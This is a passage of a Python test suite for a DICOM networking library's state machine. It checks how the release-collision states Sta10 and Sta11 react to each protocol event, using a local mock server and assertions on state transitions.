('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt14'
]
def test_evt15(self):
"""Test Sta10 + Evt15."""
# Sta10 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt15', 'AA-1'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta10 + Evt16."""
# Sta10 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt16', 'AA-3'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta10 + Evt17."""
# Sta10 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt17', 'AA-4'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta10 + Evt18."""
# Sta10 + Evt18 -> <ignore> -> Sta10
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.2),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta10 + Evt19."""
# Sta10 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt19', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
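# Sta11 (requestor side of the collision): reached from Sta9 once the local
# user answers with A-RELEASE (rsp) (Evt14 -> AR-9 sends an A-RELEASE-RP PDU);
# the DUL then waits for the remote's A-RELEASE-RP PDU (Evt13 -> AR-3 ends the
# association). Descriptive summary only, derived from the Evt/AR annotations
# asserted in the tests below.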
class TestState11(TestStateBase):
"""Tests for State 11: Release collision req - awaiting A-RELEASE-RP PDU"""
def test_evt01(self):
"""Test Sta11 + Evt1."""
# Sta11 + Evt1 -> <ignore> -> Sta11
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta11 + Evt2."""
# Sta11 + Evt2 -> <ignore> -> Sta11
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta11 + Evt3."""
# Sta11 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt3',
]
def test_evt04(self):
"""Test Sta11 + Evt4."""
# Sta11 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rj),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt4',
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta11 + Evt5."""
# Sta11 + Evt5 -> <ignore> -> Sta11
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta11 + Evt6."""
# Sta11 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rq),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt6',
]
def test_evt07(self):
"""Test Sta11 + Evt7."""
# Sta11 + Evt7 -> <ignore> -> Sta11
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt7'
]
def test_evt08(self):
"""Test Sta11 + Evt8."""
# Sta11 + Evt8 -> <ignore> -> Sta11
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt8'
]
def test_evt09(self):
"""Test Sta11 + Evt9."""
# Sta11 + Evt9 -> <ignore> -> Sta11
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt9'
]
def test_evt10(self):
"""Test Sta11 + Evt10."""
# Sta11 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', p_data_tf),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt10',
]
def test_evt11(self):
"""Test Sta11 + Evt11."""
# Sta11 + Evt11 -> <ignore> -> Sta11
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt11'
]
def test_evt12(self):
"""Test Sta11 + Evt12."""
# Sta11 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt12',
]
def test_evt13(self):
"""Test Sta11 + Evt13."""
# Sta11 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rp),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt13',
]
def test_evt14(self):
"""Test Sta11 + Evt14."""
# Sta11 + Evt14 -> <ignore> -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt14'
]
def test_evt15(self):
"""Test Sta11 + Evt15."""
# Sta11 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-release-rp
('recv', None), # recv a-abort
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt15'
]
def test_evt16(self):
"""Test Sta11 + Evt16."""
# Sta11 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_abort),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt16',
]
def test_evt17(self):
"""Test Sta11 + Evt17."""
# Sta11 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt17',
]
def test_evt18(self):
"""Test Sta11 + Evt18."""
# Sta11 + Evt18 -> <ignore> -> Sta11
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt18',
]
def test_evt19(self):
"""Test Sta11 + Evt19."""
# Sta11 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
